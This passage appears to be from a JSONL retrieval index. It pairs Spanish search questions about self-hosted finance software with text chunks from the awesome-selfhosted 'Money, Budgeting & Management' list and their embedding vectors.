-0.02696, -0.01078, -0.09946, 0.08462, 0.00461, -0.06314, 0.02769, -0.02991, 0.03001, 0.01332, 0.02465, -0.08816, -0.0594, -0.06582, 0.09226, 0.01502, -0.0446, 0.02535, 0.03605, -0.00025, -0.00554, 0.04507, -0.04899, 0.06248, 0.10042, 0.09946, -0.01358, -0.00946, 0.00748, -0.01277, -0.01367, -0.02781, 0.06913, 0.0023, 0.02421, 0.03908, -0.01854, -0.00645, -0.02295, -0.02253, 0.09525, -0.05423, 0.01352, 0.01955, 0.01133, -0.01533, -0.04553, 0.00094, 0.0152, 0.00384, 0.06942, -0.04474, 0.01179, -0.05284, -0.04181, -0.03868, -0.03106, 0.07069, -0.01838, -0.06046, -0.07759, 0.00284, -0.04867, 0.02198, -0.01065, 0.00319, 0.02201, -0.0099, 0.01066, -0.00927, -0.00962, 0.02657]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "con que puedo montar un sistema de facturaciΓ³n y cobros para mi pequeΓ±o negocio?", "v": [0.14187, 0.03426, -0.13448, -0.05322, -0.02092, -0.09797, 0.02681, 0.07749, -0.2734, -0.17009, -0.11143, -0.09082, 0.032, -0.02661, 0.05169, -0.03285, -0.02807, -0.10203, 0.05882, 0.03, 0.0474, -0.0993, 0.01476, -0.04859, -0.00997, 0.04863, 0.01583, -0.12275, -0.20194, 0.18588, 0.12854, -0.04257, 0.12011, -0.03002, 0.03664, -0.06915, 0.05481, 0.0591, 0.13912, -0.05861, 0.18999, -0.01562, 0.04588, 0.00388, 0.0013, -0.04327, 0.04085, -0.04387, -0.06775, 0.11063, 0.04826, -0.05437, -0.1244, -0.01751, -0.05564, 0.01261, -0.05768, -0.02929, 0.09061, 0.03091, 0.08455, 0.08603, 0.00791, 0.02403, 0.00332, -0.01935, 0.03425, 0.01271, 0.04663, 0.02001, -0.08123, -0.02491, -0.08375, -0.06155, 0.00636, 0.05517, 0.08534, -0.01112, 0.04573, 0.04809, 0.00246, -0.00226, -0.08852, 0.12353, -0.09366, 0.03746, -0.07217, 0.04492, 0.11637, 0.04119, -0.03216, 0.03224, 0.00614, -0.03997, -0.04004, 0.0396, 0.00117, 0.03551, -0.10509, 0.05699, -0.09596, 0.06206, -0.12211, 0.05035, 0.05698, 0.04642, 0.01839, -0.08561, 0.0147, 0.00306, -0.0269, 0.00906, -0.03773, -0.04735, -0.05825, -0.04571, 0.01484, 0.09811, -0.02452, 0.0304, 0.02421, 0.04692, 0.08176, -0.0057, 0.02943, -0.01576, -0.00975, 0.14721, 0.04123, 0.01156, 0.03829, -0.01092, -0.00568, -0.05065, 0.05935, -0.04284, -0.10628, 0.04438, -0.00868, 0.06317, -0.04977, -0.07998, -0.06847, -0.0447, 0.10099, 0.0198, 0.02841, -0.08612, -0.03505, 0.02375, -0.00952, 0.09053, -0.05351, -0.00131, -0.04524, 0.00351, 0.14843, 0.00014, 0.02354, 0.03693, 0.01021, -0.00659, 0.04039, 0.0094, -0.03862, -0.05729, -0.08628, 0.00015, 0.07186, 0.04071, -0.06006, 0.05712, -0.00655, -0.02256, 0.07591, 0.02184, -0.08732, -0.0873, 0.02636, -0.00566, -0.06888, 0.03323, 0.02441, 0.04529, -0.05768, 0.07551, 0.03234, 0.05492, 0.00707, 0.02479, 0.07021, 0.00878, -0.00147, -0.02218, -0.0436, -0.03907, -0.02257, 0.0281, -0.00179, 0.02944, -0.04096, 0.0321, 0.03011, 0.05014, -0.01805, -0.03809, 0.00913, 0.11362, 0.10631, 0.06121, 0.04069, 0.03104, -0.00456, -0.0967, -0.02251, 0.00923, -0.05793, -0.01852, -0.00433, 0.02545, -0.01428, 0.00504, 0.011, -0.00509, -0.00429, 0.02361, -0.03293, -0.03024, -0.00482, -0.03332, -0.07753, -0.08607, -0.04151, -0.00818, -0.06636, -0.05662, 0.01141, 0.01254, -0.07215, 0.0033, 0.06536, 0.06159, 0.04683, -0.02527, -0.02704, -0.0107, -0.04132, -0.01581, -0.04494, -0.0366, -0.02378, 0.05286, -0.00039, 0.00968, -0.00926, 0.02064]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "cual es una alternativa libre a las plataformas tradicionales de facturaciΓ³n?", "v": [0.24148, 0.0689, -0.03753, -0.05249, 0.01862, 0.0174, 0.12333, -0.05874, -0.13678, -0.03524, -0.10316, -0.08316, -0.04479, 0.09977, 0.02962, -0.03337, 0.05367, -0.13666, 0.11968, -0.04679, -0.09848, -0.01194, -0.1598, -0.11853, -0.01977, -0.12669, 0.02548, -0.02414, -0.13103, 0.05646, 0.1418, -0.00856, 0.12142, -0.03994, -0.01483, 0.00278, 0.10349, 0.09798, 0.0333, -0.09812, 0.11117, -0.06142, -0.00246, -0.00072, 0.00734, -0.04371, -0.05437, 0.03767, -0.00219, 0.10309, -0.02172, -0.03567, -0.09151, 0.08861, 0.03484, -0.03096, 0.09994, -0.08468, -0.01757, -0.00626, -0.03817, 0.08725, 0.14679, -0.03416, -0.00684, 0.00699, -0.02168, 0.04754, -0.00039, 0.07407, 0.07496, 0.00801, -0.05853, -0.0107, -0.06485, 0.08468, 0.00861, -0.00768, -0.03797, 0.03001, 0.05109, -0.09642, -0.03103, 0.04848, -0.11322, -0.03192, 0.04335, -0.08197, 0.01253, -0.00445, 0.02307, -0.03223, 0.02591, 0.10391, 0.00194, -0.08553, 0.02113, 0.01139, -0.08184, 0.05957, -0.05701, 0.10125, -0.07933, -0.0181, 0.04668, 0.0125, -0.01632, -0.09073, -0.02171, 0.06699, 0.01909, 0.04173, 0.01134, 0.02077, 0.012, 0.01244, -0.01809, 0.06616, 0.03746, 0.08968, 0.01724, -0.01313, 0.04471, -0.0885, 0.04655, 0.04341, -0.01368, 0.13447, -0.01551, 0.03879, 0.01767, -0.0839, -0.01932, -0.07434, -0.04446, -0.12185, 0.08377, 0.0105, 0.08615, 0.0336, -0.00032, -0.01667, 0.00124, -0.08566, 0.11774, -0.05309, 0.02105, -0.1068, -0.05263, 0.01646, -0.10564, 0.0545, -0.0711, 0.11385, -0.04102, -0.00176, 0.0107, -0.00529, -0.13475, 0.16502, 0.02306, -0.05573, -0.02376, 0.01805, -0.07845, -0.03674, -0.04256, 0.04405, -0.00322, -0.00391, 0.00894, 0.07533, 0.01549, -0.09333, 0.04563, -0.04006, -0.04922, -0.08337, 0.06813, -0.01665, -0.06442, 0.00637, -0.11584, -0.06206, 0.02886, -0.00578, -0.02023, -0.03033, 0.03824, 0.08842, 0.01644, 0.03372, -0.11042, -0.07841, -0.04897, -0.00572, -0.0353, 0.03111, -0.02892, -0.01682, -0.05873, -0.00693, 0.01144, -0.03036, -0.0332, 0.01591, -0.03984, 0.04443, 0.02151, 0.05177, 0.02516, 0.00536, 0.0398, -0.08102, -0.02239, -0.03378, -0.00919, -0.10923, 0.00804, -0.01009, 0.00652, 0.02771, -0.00926, 0.02121, -0.02263, 0.09681, 0.05047, 0.06166, -0.04941, -0.02677, -0.01942, -0.04675, -0.02868, 0.0349, -0.03944, -0.01762, 0.01181, -0.00797, -0.08471, 0.02684, 0.0289, 0.06534, 0.01112, -0.00372, -0.0149, 0.01861, -0.09184, -0.05616, -0.02983, -0.00403, -0.07448, 0.06704, 0.07121, 0.05043, 0.02395, -0.00354]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: MyFin Budget β€” Personal finances platform (web + REST API + Android) that'll help you budget, keep track of your income/spending and forecast your financial future [GPL-3.0, Nodejs/Docker]. OctoBot β€” Cryptocurrency trading bot [GPL-3.0, Python/Docker]. Ocular β€” Simplistic and straightforward budgeting app to track your budget across months and years [MIT, Docker]. OpenBudgeteer β€” Budgeting app based on the Bucket Budgeting Principle [AGPL-3.0, Docker/C#]. Receipt Wrangler β€” Easy-to-use receipt manager, powered by AI. Allows users to create receipts effortlessly and quickly, categorize and more [⚠, AGPL-3.0, Docker]. REI3 β€” Manage tasks, time, assets and much more within your business [MIT, Go]. SHKeeper β€” Cryptocurrency payment processor with the unique combination of gateway and merchant allowing you to accept payments in multiple cryptocurrencies without fees and intermediaries [GPL-3.0, Python]. SolidInvoice β€” Open source invoicing and quote application [MIT, PHP].", "indexar": "que programa hay para gestionar mis finanzas personales y prever el futuro financiero", "v": [0.08964, -0.03405, 0.04332, -0.12302, 0.19773, -0.07859, 0.04039, -0.10794, -0.27185, -0.09488, 0.05019, 0.01263, -0.03048, 0.04996, -0.04305, 0.02961, -0.01059, -0.12842, 0.00308, -0.00832, 0.03522, -0.04477, 0.04136, -0.0949, -0.01923, -0.0231, 0.10666, -0.12312, -0.07455, -0.02865, 0.18303, -0.02686, 0.13695, -0.05991, 0.06524, 0.12297, 0.05206, 0.0152, -0.02059, -0.03904, 0.11306, -0.00497, 0.07139, -0.0199, 0.15479, -0.03567, -0.0209, -0.00303, 0.02906, -0.01728, 0.0344, -0.03277, 0.04918, 0.09311, 0.11529, 0.01254, -0.04728, -0.0922, -0.01922, 0.00799, -0.06017, 0.05855, 0.11781, 0.12418, -0.08986, 0.03853, 0.1039, -0.02786, -0.07259, 0.0284, -0.05427, 0.00705, -0.0036, 0.10554, 0.00476, -0.02359, 0.06656, 0.09648, -0.10721, -0.08639, -0.13491, -0.066, -0.04544, 0.13481, -0.06707, -0.0512, 0.01997, 0.08124, -0.08047, -0.00435, -0.11546, 0.02775, -0.09937, -0.1016, -0.03031, 0.11393, 0.03357, 0.00077, -0.01775, -0.0684, 0.04452, -0.06755, -0.15376, 0.04546, -0.07262, 0.11412, 0.07162, -0.00285, -0.04622, -0.02424, -0.07599, 0.05935, 0.00013, -0.03002, 0.01417, 0.06632, 0.00438, 0.06349, 0.09914, -0.04848, -0.04909, -0.0425, 0.02807, 0.01718, 0.07453, -0.01071, 0.01643, 0.00561, 0.05357, 0.07904, -0.0924, 0.01824, -0.02572, -0.00193, -0.0575, -0.01864, -0.05625, 0.01511, 0.0288, -0.08606, -0.02252, 0.08835, 0.00373, -0.00641, 0.04859, -0.06264, 0.02239, -0.01953, -0.02744, -0.00136, -0.0043, -0.05391, -0.09841, 0.07167, 0.02639, -0.05701, 0.07235, 0.08829, -0.05129, 0.0446, -0.01314, 0.00046, 0.00393, 0.00473, -0.04503, -0.09317, 0.02146, 0.03381, -0.02422, 0.02641, 0.06253, 0.01831, 0.0523, -0.05758, 0.0418, -0.07544, 0.03867, -0.05404, 0.06194, -0.0157, -0.04053, -0.0376, 0.02624, 0.03364, -0.07241, -0.01402, -0.0334, 0.06573, -0.00578, 0.00881, -0.01756, 0.01091, -0.08661, 0.02993, 0.01431, -0.01904, -0.01555, -0.024, 0.02969, 0.03148, -0.01234, -0.00421, 0.00247, 0.0454, 0.04069, 0.09246, -0.04615, 0.04083, -0.01106, 0.05897, 0.03537, -0.00766, 0.09256, -0.00364, 0.00017, -0.03319, 0.00197, 0.0676, -0.04757, 0.04417, 0.0082, -0.01563, 0.05929, 0.04151, -0.01674, -0.02155, -0.03037, 0.03517, 0.03829, -0.01554, -0.01997, 0.0359, -0.06109, -8e-05, -0.0215, 0.03069, 0.01303, -0.04261, -0.05574, -0.09415, 0.03399, 0.05385, 4e-05, -0.06759, -0.04279, 0.02226, -0.13331, 0.03507, -0.04101, 0.00091, 0.02188, -0.00363, 0.03271, 0.02778, 0.06013, 0.00478]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: MyFin Budget β€” Personal finances platform (web + REST API + Android) that'll help you budget, keep track of your income/spending and forecast your financial future [GPL-3.0, Nodejs/Docker]. OctoBot β€” Cryptocurrency trading bot [GPL-3.0, Python/Docker]. Ocular β€” Simplistic and straightforward budgeting app to track your budget across months and years [MIT, Docker]. OpenBudgeteer β€” Budgeting app based on the Bucket Budgeting Principle [AGPL-3.0, Docker/C#]. Receipt Wrangler β€” Easy-to-use receipt manager, powered by AI. Allows users to create receipts effortlessly and quickly, categorize and more [⚠, AGPL-3.0, Docker]. REI3 β€” Manage tasks, time, assets and much more within your business [MIT, Go]. SHKeeper β€” Cryptocurrency payment processor with the unique combination of gateway and merchant allowing you to accept payments in multiple cryptocurrencies without fees and intermediaries [GPL-3.0, Python]. SolidInvoice β€” Open source invoicing and quote application [MIT, PHP].", "indexar": "cual es una alternativa libre a las apps de presupuesto tradicionales", "v": [0.02903, 0.09715, -0.05655, -0.13516, -0.00892, 0.07755, 0.02565, -0.07062, -0.14388, -0.04363, -0.11069, -0.1116, -0.06088, 0.03192, 0.03222, -0.10399, 0.00566, -0.07883, 0.18989, 0.06118, 0.00315, -0.02522, -0.16191, 0.01689, -0.04371, -0.08616, 0.07569, 0.00583, -0.13891, -0.00408, 0.06261, 0.00485, 0.11848, -0.09396, -0.09049, 0.01237, 0.14094, 0.13572, -0.09022, -0.12104, 0.1453, -0.05318, 0.01815, 0.01947, -0.06722, -0.06211, -0.04911, 0.14647, -0.06633, 0.00568, -0.07356, -0.0667, 0.03242, 0.14314, 0.05379, -0.02797, 0.06973, -0.13271, -0.08823, -0.07187, -0.08723, 0.01216, 0.0199, 0.01567, 0.03192, 0.02842, -0.01839, 0.06785, -0.03117, -0.02813, 0.10603, 0.0324, -0.06014, 0.0415, -0.07211, 0.09041, -0.03798, -0.05515, -0.03891, 0.00889, -0.02161, -0.10726, 0.01764, 0.06248, -0.14778, -0.06627, 0.09655, -0.00553, 0.05535, 0.03378, -0.03909, 0.01238, -0.03916, 0.13054, -0.05802, -0.0631, 0.0112, 0.07654, 0.05351, 0.14121, 0.04827, -0.05956, -0.15279, -0.01224, 0.00073, 0.05292, 0.05245, 0.04613, -0.03384, -0.00584, -0.03942, -0.00712, 0.00239, 0.08687, -0.03743, -0.01699, 0.00776, 0.01632, 0.01623, 0.01296, -0.00814, 0.04266, -0.02992, -0.0384, 0.08396, 0.02532, 0.02099, 0.07657, -0.00479, 0.08081, 0.05939, -0.0066, -0.04908, -0.04241, -0.12127, -0.08644, 0.06161, -0.0178, 0.01071, 0.01973, -0.01355, -0.01516, -0.00332, -0.05028, 0.07682, 0.01457, -0.00709, -0.02213, 0.00508, 0.0352, 0.03042, 0.00548, -0.03687, 0.12605, -0.05129, 0.02474, -0.10386, 0.02212, -0.08297, 0.11798, -0.01599, -0.05853, -0.01731, -0.0768, -0.02667, -0.07174, -0.03201, -0.02799, 0.04181, 0.02467, 0.00733, 0.11033, 0.07966, -0.08999, 0.04971, -0.10023, 0.01899, -0.13478, 0.0769, -0.029, -0.05014, 0.02419, -0.11146, -0.02175, 0.04859, -0.05076, -0.00703, -0.00045, 0.01526, -0.00592, -0.03507, 0.05005, -0.03577, -0.04518, -0.02231, -0.03489, -0.01759, -0.0223, -0.02686, -0.00245, -0.00629, 0.03785, -0.00669, -0.07889, -0.01659, 0.00462, -0.02767, -0.01536, -0.05403, 0.10512, 0.03787, -0.01543, 0.07208, 0.02645, -0.00539, -0.00054, 0.05931, -0.03146, 0.00661, 0.00117, 0.03138, 0.00903, 0.00742, -0.00571, -0.0042, 0.02325, 0.05095, 0.02233, -0.0299, -0.0227, -0.01551, -0.02948, -0.06094, 0.007, 0.00571, 0.05585, 0.00182, -0.03458, -0.0739, 0.00735, 0.04674, 0.07694, -0.02402, -0.02298, -0.06176, 0.01972, -0.08965, -0.01521, -0.00055, -0.02792, 0.00756, 0.12325, 0.07415, 0.0164, 0.02869, -0.02552]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "que programa hay para llevar un presupuesto personal?", "v": [-0.02283, 0.08238, -0.08262, -0.24465, 0.02303, -0.01594, 0.09128, -0.05953, -0.05835, -0.14259, -0.08189, 0.03926, 0.0538, -0.04653, -0.10195, -0.06, 0.03477, -0.00624, 0.11269, 0.10312, 0.02593, 0.06299, 0.00345, 0.05661, -0.05449, 0.00556, 0.09495, -0.04, -0.11791, 0.00997, 0.06524, -0.02034, 0.00506, -0.0895, 0.02683, 0.0246, 0.13693, 0.1415, -0.04262, -0.01862, 0.13339, -0.00124, 0.08174, 0.07381, 0.04892, -0.02279, 0.02967, 0.15881, -0.0034, -0.05955, -0.03211, 0.02819, 0.10617, 0.07376, 0.09258, -0.05462, -0.08372, -0.13418, -0.10118, -0.08711, -0.06008, -0.05319, -0.00067, 0.00243, -0.01048, 0.08826, 0.04388, -0.00862, -0.04461, -0.12549, 0.00573, -0.06404, -0.05428, 0.00586, -0.03795, -0.00267, 0.04491, -0.03177, 0.0015, -0.03457, -0.07988, -0.0584, 0.04034, 0.05375, -0.21293, 0.01349, 0.09734, 0.03435, 0.09359, 0.10805, -0.02937, -0.00369, -0.09487, 0.0834, -0.08081, 0.05159, 0.09371, 0.04144, 0.00163, 0.04339, 0.04343, -0.13091, -0.09207, 0.09318, -0.03527, 0.18344, 0.08776, 0.03302, -0.05967, 0.00873, -0.05813, 0.0299, 0.00645, -0.00263, -0.08615, -0.06212, 0.02366, 0.03876, 0.06391, 0.00031, -0.03466, 0.09387, -0.03958, 0.03196, 0.09528, 0.02547, -0.02414, 0.05088, 0.00655, 0.09447, 0.02535, 0.02167, 0.00034, -0.01931, -0.03809, -0.08436, -0.03644, -0.03586, 0.0216, -0.01244, -0.04096, -0.02666, 0.01022, 0.03442, 0.03114, -0.03284, -0.07309, -0.0255, -0.03037, 0.0772, 0.11747, 0.03498, 0.04781, 0.09471, -0.04608, 0.00225, 0.01063, 0.10427, -0.07878, 0.02008, -0.08783, 0.00783, 0.00774, -0.07577, 0.09032, -0.08132, -0.04342, 0.04513, 0.07579, 0.06513, -0.01453, 0.09965, 0.09787, -0.04563, 0.03762, -0.09869, 0.01494, -0.13738, 0.02907, 0.02559, -0.06882, 0.06472, 0.02071, -0.00686, 0.03623, -0.02887, 0.00116, 0.03683, -0.00979, -0.05553, -0.06008, 0.02097, 0.02654, 0.01882, -0.03232, -0.02939, -0.04496, 0.02545, 0.02078, 0.02017, 0.0351, 0.02741, 0.00821, -0.00929, 0.03465, 0.02711, -0.05535, -0.08644, 0.00671, 0.11596, 0.03366, -0.06901, 0.00965, -0.03183, -0.00384, 0.09265, 0.05896, 0.03216, 0.06287, 0.04613, 0.01408, 0.01682, 0.00258, 0.0091, 0.0136, -0.03622, 0.02016, -0.01057, 0.01505, -0.01956, -0.02351, -0.01931, -0.03837, -0.03461, -0.01588, 0.03372, -0.00099, -0.04863, -0.06231, -0.04871, 0.00487, 0.06942, -0.04758, -0.05494, -0.017, 0.01729, -0.03768, 0.0177, 0.01306, 0.00647, 0.06387, 0.07099, -0.0012, -0.01811, 0.04913, 0.00549]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "con que puedo administrar mis cupones y tarjetas de regalo digitalmente?", "v": [0.24992, 0.08089, -0.07049, -0.05739, 0.03182, -0.07683, 0.11393, 0.13374, -0.20301, -0.1188, -0.1018, -0.14728, -0.02133, -0.1423, -0.092, -0.04999, 0.1296, 0.0241, 0.09589, 0.08955, 0.18082, -0.05519, -0.0777, -0.08282, -0.05825, -0.02442, 0.10474, -0.01856, -0.15167, 0.13585, 0.11936, -0.03593, -0.02682, -0.12601, -0.01339, -0.03631, 0.03468, 0.16157, 0.03216, 0.00537, 0.08997, 0.10359, -0.04678, 0.0003, -0.03408, 0.01982, -0.04983, 0.09027, 0.02231, -0.00341, -0.02155, -0.06538, -0.10207, -0.04994, -0.00596, -0.04618, 0.0671, -0.07339, 0.04781, -0.05926, -0.00833, 0.00038, -0.01065, 0.06803, 0.00713, 0.08413, -0.00696, -0.04294, -0.156, 0.01687, -0.09096, 0.06684, 0.00385, -0.05843, 0.04068, 0.06212, -0.03289, 0.00152, -0.00554, -0.00863, 0.0413, -0.00251, -0.01055, 0.05387, -0.0402, -0.08367, 0.00033, -0.05006, 0.03348, -0.08706, 0.01482, 0.06654, 0.00621, 0.02854, -0.07298, 0.0105, 0.00102, 0.0041, -0.05591, 0.12573, 0.0477, 0.05936, -0.08667, 0.05023, -0.0504, 0.01185, 0.04427, -0.00918, 0.03219, -0.02203, -0.07821, -0.01876, -0.08449, 0.00663, -0.03263, 0.03404, 0.05517, -0.04648, 0.0813, 0.02564, -0.07391, -0.09708, 0.01796, 0.04726, 0.06036, 0.08316, -0.05969, 0.0977, 0.03429, -0.00519, -0.03514, 0.01285, -0.00428, -0.05847, 0.02049, 0.01191, -0.03876, 0.013, 0.02782, -0.00339, -0.00113, 0.02978, 0.09502, -0.04806, 0.07997, -0.00997, -0.02208, -0.06827, -0.07308, 0.06368, -0.037, -0.01741, 0.03274, 0.04426, 0.00538, 0.02006, 0.00238, -0.09772, -0.03721, 0.01919, -0.03661, -0.01548, 0.00925, 0.12611, -0.00903, -0.06833, -0.04729, -0.00454, 0.03941, 0.0538, -0.03997, 0.01394, 0.00292, 0.03095, 0.0723, -0.09768, -0.05452, -0.01761, 0.02393, -0.02058, -0.1021, 0.03544, -0.00493, 0.00455, -0.07585, 0.00776, -0.00091, 0.04728, 0.09519, 0.02761, 0.08271, 0.02571, 0.01897, 0.07775, 0.00407, -0.07627, -0.00342, 0.04863, -0.05233, -0.07105, 0.00364, 0.03427, -0.01928, -0.06687, 0.03359, 0.0475, -0.00846, 0.03738, 0.01421, 0.07047, 0.02074, -0.09733, 0.03927, -0.04752, -0.0921, 0.01375, 0.01657, 0.04046, -0.01583, -0.01084, 0.08783, 0.02054, 0.00805, -0.01147, 0.05225, 0.0431, 0.02675, 0.04935, 0.05157, -0.01528, -0.00633, 0.00251, -0.03301, -0.0187, 0.06566, 0.03876, 0.04084, -0.0291, -0.11509, -0.02492, 0.01995, 0.04207, -0.03128, -0.02307, -0.0578, -0.07197, -0.11217, -0.02405, -0.05019, -0.06163, -0.01047, 0.02944, 0.02649, -0.02965, 0.0115, -0.0241]} +{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "cual es una alternativa libre para rastrear mis suscripciones?", "v": [-0.00498, -0.00041, -0.05635, -0.01585, 0.03044, -0.10634, -0.06152, -0.12847, -0.15142, 0.01135, 0.00512, -0.21849, 0.02928, 0.01338, 0.17896, -0.03121, -0.00825, 0.02215, 0.05348, 0.05132, -0.07083, -0.07871, -0.08187, -0.05814, -0.10444, -0.12, -0.01379, 0.02854, -0.15427, -0.01304, -0.02065, 0.0604, 0.04225, 0.01031, 0.00103, 0.00964, 0.18456, 0.01458, 0.01023, 0.04867, 0.03441, -0.08326, -0.04033, 0.11559, -0.07764, -0.12778, -0.0887, 0.11136, -0.02341, 0.12326, -0.04139, 0.02994, -0.09962, 0.03439, 0.09772, 0.01387, 0.15725, -0.15849, -0.04409, -0.04107, -0.06278, -0.02947, 0.04445, -0.09067, 0.02775, -0.00307, -0.04802, -0.04207, -0.10733, 0.09919, 0.11765, 0.05582, -0.04818, -0.03867, -0.05247, 0.08648, -0.05398, -0.0171, 0.10498, 0.10589, 0.02975, -0.08006, -0.05104, 0.0905, 0.00804, -0.03197, 0.08903, -0.10362, 0.0231, 0.05595, 0.05362, 0.01243, -0.01534, 0.15961, 0.00242, -0.06854, 0.03138, 0.07228, -0.03321, 0.10911, -0.01269, 0.01975, -0.1003, 0.0058, -0.03769, -0.01066, -0.04546, 0.06134, -0.08911, 0.06394, -0.00953, 0.05147, -0.04458, 0.01377, 0.00917, -0.09089, -0.07111, 0.05769, 0.072, -0.04841, -0.03258, -0.03149, -0.03117, -0.07375, 0.02232, 0.04306, -0.00992, 0.04442, -0.04011, 0.07508, 0.03832, -0.02883, -0.0981, -0.09372, -0.10032, -0.01147, 0.05251, -0.013, 0.04719, -0.00023, 0.04038, -0.03759, 0.01516, -0.01372, -0.00618, -0.08249, 0.04763, -0.04436, -0.03666, -0.04765, -0.13523, 0.0666, 0.02646, 0.12073, 0.02067, 0.00493, 0.03016, -0.06374, -0.06565, 0.06307, 0.02742, -0.03982, -0.0525, -0.02966, 0.02673, -0.01424, 0.0075, -0.03632, -0.13798, 0.0184, 0.04989, 0.07287, 0.04889, -0.11086, 0.0764, -0.07001, 0.00155, -0.06791, 0.05633, -0.05602, 0.05392, 0.02677, -0.05788, 0.00337, -0.02265, -0.0306, 0.01365, -0.02373, 0.00526, 0.02701, -0.01976, -0.00562, -0.06014, -0.09779, -0.05053, 0.03633, 0.02623, -0.08798, -0.00864, -0.04104, -0.09244, -0.07216, -0.0705, 0.01379, -0.03714, -0.02738, -0.0424, 0.00167, 0.03403, 0.02934, 0.05864, 0.02702, 0.08123, 0.02476, -0.09546, 0.01154, 0.02532, -0.00845, 0.02155, -0.02404, 0.019, 0.06258, 0.0236, 0.02565, -0.01519, -0.00567, 0.03354, 0.0277, -0.05493, 0.03123, 0.03294, -0.00347, -0.02184, 0.02677, 0.01849, -0.00674, -0.02576, 0.01498, 0.02187, 0.00189, 0.0569, 